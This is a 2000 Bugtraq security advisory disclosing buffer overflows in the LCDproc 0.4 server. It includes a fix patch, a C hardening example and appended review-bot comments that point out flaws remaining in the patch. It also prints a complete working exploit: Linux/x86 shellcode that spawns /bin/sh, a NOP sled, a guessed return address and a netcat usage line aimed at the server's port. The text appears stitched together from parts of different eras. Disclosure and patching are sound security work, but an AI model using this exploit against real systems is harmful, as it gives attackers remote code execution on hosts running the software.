
Date:         Fri, 21 Apr 2000 01:12:18 -0400
From: Andrew Hobgood <chaos@STRANGE.NET>
Subject:      Remote vulnerability in LCDproc 0.4
To: BUGTRAQ@SECURITYFOCUS.COM




==============================================================
=== Title:		Vulnerability in LCDproc           ===
=== Date:		20 April 2000                      ===
=== Author:		Andrew Hobgood <chaos@strange.net> ===
==============================================================

[ Note: The LCDproc maintainers have been notified of this vulnerability, ]
[       and have stated that they are prepared for this advisory to be    ]
[       released.                                                         ]

=================
=== Specifics ===
=================

LCDproc (http://lcdproc.omnipotent.net) is a system to display system
information and other data on an LCD display (or any supported display
device, including curses or text).  As of version 0.4, the system utilizes
a client/server model for communication, and clients wishing to display
data on the LCDproc host device can connect to the LCDproc server and
negotiate a session.

This system is commonly used in embedded server environments and other
locations where system statistics must be available quickly, but space
requirements or other restrictions prevent connecting a monitor or other
display unit.  Also, since it must often communicate with the LCD device,
it is commonly installed setuid root or setgid uucp.

While this system provides for a highly extensible means of displaying
data, the protocol handling code has a few bugs with dire consequences.

The vulnerabilities in LCDproc allow an attacker to remotely execute
arbitrary code or cause the LCDproc server to crash.

Improper boundary conditions exist at various locations in the code,
including:

[ Note: argv[0] in this context is *not* the argv[] from main(). ]

parse.c:149: sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
screenlist.c:119: sprintf(str, "ignore %s\n", old_s->id);
screenlist.c:134: sprintf(str, "listen %s\n", s->id);

As well as other locations.
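The two boundary problems above (an unbounded sprintf into a fixed-size
buffer, and a token parser that can run past a fixed-size argv) are easy to
close in a few lines of plain C.  The following is an added illustration, not
LCDproc code: split_args, format_reply, MAX_ARGS and REPLY_LEN are
hypothetical names chosen here, and the input lines are constructed for the
demonstration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_ARGS  8    /* fixed-size argv, like the server's (hypothetical size) */
#define REPLY_LEN 32   /* kept small so the truncation path is easy to exercise */

/*
 * Split a command line in place on blanks into argv[], storing at most
 * max_args pointers.  Tokens beyond the limit are counted in *dropped
 * instead of being written past the end of the array, which is the
 * "too many arguments" boundary that parse.c lacked.
 */
int split_args(char *line, char **argv, int max_args, int *dropped)
{
	int argc = 0, newtoken = 1;
	char *p;

	*dropped = 0;
	for (p = line; *p; p++) {
		if (*p == ' ' || *p == '\t' || *p == '\r' || *p == '\n') {
			*p = '\0';      /* terminate the token we were in */
			newtoken = 1;
		} else if (newtoken) {
			newtoken = 0;   /* first byte of a new token */
			if (argc < max_args)
				argv[argc++] = p;
			else
				(*dropped)++;
		}
	}
	return argc;
}

/*
 * Format the "huh? Invalid command" reply into a caller-supplied buffer.
 * snprintf never writes past outlen bytes and always NUL-terminates, so
 * the result is safe to send; the return value tells the caller whether
 * the message was cut short, which a bare snprintf(..., 256, ...) hides.
 */
int format_reply(char *out, size_t outlen, const char *cmd)
{
	int n = snprintf(out, outlen, "huh? Invalid command \"%s\"\n", cmd);
	return (n < 0 || (size_t) n >= outlen) ? -1 : 0;
}

int main(void)
{
	/* constructed sample input: a normal line and one with too many tokens */
	char line[] = "screen_add foo bar";
	char flood[] = "a b c d e f g h i j";
	char *argv[MAX_ARGS];
	char reply[REPLY_LEN];
	int argc, dropped;

	argc = split_args(line, argv, MAX_ARGS, &dropped);
	printf("%d args, %d dropped, argv[0]=%s\n", argc, dropped, argv[0]);

	argc = split_args(flood, argv, MAX_ARGS, &dropped);
	printf("%d args, %d dropped\n", argc, dropped);

	if (format_reply(reply, sizeof reply, "averyveryverylongcommandname") < 0)
		printf("reply truncated to: %s\n", reply);
	return 0;
}
```

Passing sizeof the destination rather than a repeated literal keeps the
bound attached to the declaration, and checking the snprintf return value
turns silent truncation of a protocol line into something the caller can log
or reject.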


==============
=== Impact ===
==============

Any system running LCDproc 0.4 or above (including the 0.4-pre series) that
is susceptible to buffer overflow attacks is vulnerable.  The exploit below
targets only Linux/x86 and has limited attack potential, but the vulnerability
itself is not limited to that platform.

Remote access can be gained as whatever user and group that LCDproc is
running as.


==========================
=== Temporary Solution ===
==========================

Disable LCDproc, or downgrade to version 0.3 or earlier, which predates the
client/server implementation introduced in 0.4.

There is also a patch included in this message which can be applied against
LCDproc version 0.4-pre9 (available from the LCDproc home site at
http://lcdproc.omnipotent.net).


================================
=== Patch (against 0.4-pre9) ===
================================

[ This patch is also available at                          ]
[ http://web.strange.net/patches/lcdproc.20April2000.patch ]

(Patch has been attached to this message to prevent linewrapping and other
such confusions.)


===============
=== Exploit ===
===============

[ Note: This code launches /bin/sh on the remote site.  Unfortunately, this ]
[       shell is execve()'ed, and inherits the stdin/stdout of the main     ]
[       LCDproc process, and therefore just runs /bin/sh on the remote      ]
[       site, instead of over the socket.  Blah.  I didn't feel like        ]
[       hacking up shellcode to do something more productive.  I'm sure     ]
[       that someone else much more capable than myself will take care of   ]
[       that on my behalf.                                                  ]

/*****
 * lcdproc-exploit.c
 *****
 *
 * LCDproc 0.4-pre9 exploit
 *
 * Andrew Hobgood <chaos@strange.net>
 * Kha0S on #LinuxOS/EFnet
 *
 * Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands
 * on for testing).
 *
 *****
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

#define BUFFERSIZE 269          /* length of the screen_add argument sent */
#define NOP 0x90
#define OFFSET 0xbffff750       /* guessed stack address; adjust via argv[1] */

/* Linux/x86 execve("/bin/sh") shellcode */
char shellcode[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
	"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
	"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
	"\xff\xff/bin/sh";

int main(int argc, char **argv) {
	char *ptr, buffer[BUFFERSIZE + 1];     /* +1: room for the terminating NUL */
	uint32_t *long_ptr, offset = OFFSET;   /* 32-bit addresses: x86 target */
	int aux;

	fprintf(stderr, "LCDproc exploit by Andrew Hobgood <chaos@strange.net>\n\n");
	fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target> 13666\n\n", argv[0]);

	if (argc == 2) offset += (uint32_t) atol(argv[1]);

	/* NOP sled, then the shellcode, then four copies of the address */
	ptr = buffer;
	memset(buffer, 0, sizeof(buffer));
	memset(ptr, NOP, BUFFERSIZE - strlen(shellcode) - 16);
	ptr += BUFFERSIZE - strlen(shellcode) - 16;
	memcpy(ptr, shellcode, strlen(shellcode));
	ptr += strlen(shellcode);
	long_ptr = (uint32_t *) ptr;
	for (aux = 0; aux < 4; aux++) *(long_ptr++) = offset;
	ptr = (char *) long_ptr;
	*ptr = '\0';                           /* buffer[BUFFERSIZE], within bounds */

	fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer));
	fprintf(stderr, "Offset: 0x%08x\n\n", (unsigned) offset);

	/* greet the server, then send the oversized screen id */
	printf("hello\n");
	fflush(stdout);
	sleep(1);
	printf("screen_add {%s}\n", buffer);
	fflush(stdout);

	return 0;
}

/*** end lcdproc-exploit.c ***/


[ Attachment: lcdproc.patch ]

diff -ur ./WHATSNEW ../lcdproc-hacked/WHATSNEW
--- ./WHATSNEW	Thu Oct 21 20:04:59 1999
+++ ../lcdproc-hacked/WHATSNEW	Thu Apr 20 13:53:54 2000
@@ -11,6 +11,11 @@
  * Better syntax for driver parameters
  * Dynamically-loaded driver system
 
+>> Patched for bugs as follows by Andrew Hobgood <chaos@strange.net>:
+ * Three buffer overflows in various locations [screenlist.c, parse.c, others]
+ * Prevent too many arguments from walking over the boundary of the fixed
+   client_func argv.
+
 V0.4-pre9:
  * small fixes for irix
  * Added flag in LCDd to shut off server screen:  
diff -ur ./server/client_functions.c ../lcdproc-hacked/server/client_functions.c
--- ./server/client_functions.c	Thu Oct 21 18:14:21 1999
+++ ../lcdproc-hacked/server/client_functions.c	Thu Apr 20 14:12:42 2000
@@ -68,7 +68,7 @@
    
    for(i=0; i<argc; i++)
    {
-      sprintf(str, "test_func_func:  %i -> %s\n", i, argv[i]);
+      snprintf(str, 256, "test_func_func:  %i -> %s\n", i, argv[i]);
       printf(str);
       sock_send_string(c->sock, str);
    }
@@ -89,7 +89,7 @@
    
    debug("Hello!\n");
 
-   sprintf(str,
+   snprintf(str, 256,
 	   "connect LCDproc %s lcd wid %i hgt %i cellwid %i cellhgt %i\n",
 	   version, lcd.wid, lcd.hgt, lcd.cellwid, lcd.cellhgt);
    sock_send_string(c->sock, str);
@@ -193,6 +193,9 @@
    }
 
 
+   // truncate argv[1] so that it can't be used later to overflow any
+   // buffers.				Andrew Hobgood <chaos@strange.net>
+   argv[1][128] = 0;
    debug("screen_add: Adding screen %s\n", argv[1]);
    err = screen_add(c, argv[1]);
    if(err < 0)
diff -ur ./server/parse.c ../lcdproc-hacked/server/parse.c
--- ./server/parse.c	Sat Feb 20 20:53:23 1999
+++ ../lcdproc-hacked/server/parse.c	Thu Apr 20 14:06:52 2000
@@ -93,12 +93,21 @@
 	       if(newtoken && str[i])
 	       {
 		  newtoken=0;
-		  argv[argc] = str + i;
-		  argc++;
-	       }
-	       else
-	       {
-	       }
+		  // make sure that we're not going to go over the fixed 
+		  // number of allowed arguments in argv
+		  // 			Andrew Hobgood <chaos@strange.net>
+		  if(argc < 255) 
+		  {
+		    argv[argc] = str + i;
+		    argc++;
+		  } else 
+		  {
+	            debug("Too many arguments, ignoring past 256.\n");
+		  }
+		}
+	        else
+		{
+		}
 	    }
 	    if(inquote)
 	    {
@@ -135,7 +144,9 @@
 	    if(invalid)
 	    {
 	       // FIXME:  Check for buffer overflows here...
-	       sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
+	       // You were right -- there was one here. =)  More or less 
+	       // fixed: 		Andrew Hobgood <chaos@strange.net>
+	       snprintf(errmsg, 256, "huh? Invalid command \"%s\"\n", argv[0]);
 	       sock_send_string(c->sock, errmsg);
 	    }
 
diff -ur ./server/screenlist.c ../lcdproc-hacked/server/screenlist.c
--- ./server/screenlist.c	Fri Mar 12 00:20:39 1999
+++ ../lcdproc-hacked/server/screenlist.c	Thu Apr 20 14:09:03 2000
@@ -116,7 +116,7 @@
 	    c = old_s->parent;
 	    if(c)  // Tell the client we're not listening any more...
 	    {
-	       sprintf(str, "ignore %s\n", old_s->id);
+	       snprintf(str, 256, "ignore %s\n", old_s->id);
 	       sock_send_string(c->sock, str);
 	    }
 	    else  // The server has the display, so do nothing
@@ -131,7 +131,7 @@
 	 c = s->parent;
 	 if(c)  // Tell the client we're paying attention...
 	 {
-	    sprintf(str, "listen %s\n", s->id);
+	    snprintf(str, 256, "listen %s\n", s->id);
 	    sock_send_string(c->sock, str);
 	 }
 	 else  // The server has the display, so do nothing
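Review bot: in the WHATSNEW hunk, the entry "Three buffer overflows in various locations [screenlist.c, parse.c, others]" undercounts what the diff actually touches: five sprintf calls become snprintf across client_functions.c, parse.c and screenlist.c, and client_functions.c additionally truncates argv[1]. Name the files and the argv[1] truncation explicitly so the changelog matches the patch.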
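Review bot: in the client_functions.c hunk at @@ -68,7 +68,7 @@, the unchanged `printf(str);` hands a string built from client-supplied argv[i] to printf as the format argument, so any `%` in the client's data is interpreted as a conversion; it should be `printf("%s", str);`. The new `snprintf(str, 256, ...)` also hard-codes the limit; if `str` is a fixed array (its declaration is outside the hunk), `sizeof(str)` keeps the bound attached to the declaration.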
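Review bot: in the client_functions.c hunk at @@ -193,6 +193,9 @@, `argv[1][128] = 0;` stores unconditionally at offset 128. When argv[1] is shorter than 129 bytes the write lands past its own terminator, in whatever follows in the shared line buffer (the parse.c hunk shows each argv[] entry is a pointer into `str`, so this can clobber a later argument), and if the whole line is shorter than that, beyond the buffer. Guard it, e.g. `if (strlen(argv[1]) > 128) argv[1][128] = 0;`, and confirm argc >= 2 before dereferencing argv[1] unless the caller already does.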
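Review bot: in the parse.c hunk at @@ -93,12 +93,21 @@, the guard `if(argc < 255)` and the message `"Too many arguments, ignoring past 256.\n"` disagree, and neither is tied to the actual length of the argv array (declared outside the hunk); define that length once and compare against it so the check cannot drift from the declaration. Silently dropping the excess tokens also means an over-long command is executed in truncated form rather than rejected; rejecting the whole line is the safer behaviour. The empty `else { }` retained after the block can be removed, and the new lines mix tab and space indentation.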
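Review bot: in the parse.c hunk at @@ -135,7 +144,9 @@, the original `// FIXME:  Check for buffer overflows here...` is left standing above the fix with a second comment saying it has been fixed; replace the FIXME instead of stacking comments. The `snprintf(errmsg, 256, ...)` truncates silently when argv[0] is long, which is safe for the send, but `sizeof(errmsg)` would avoid relying on a constant declared elsewhere.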
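Review bot: in the screenlist.c hunk at @@ -116,7 +116,7 @@ (and the identical change at @@ -131,7 +131,7 @@), `snprintf(str, 256, ...)` bounds the write, but the `ignore %s` and `listen %s` protocol lines are silently cut short if the screen id is long; since that id originates in a client's screen_add argument, either bound ids when the screen is created or check the snprintf return value so a truncated line is not sent as if complete. As elsewhere in the patch, `sizeof(str)` is preferable to the literal 256.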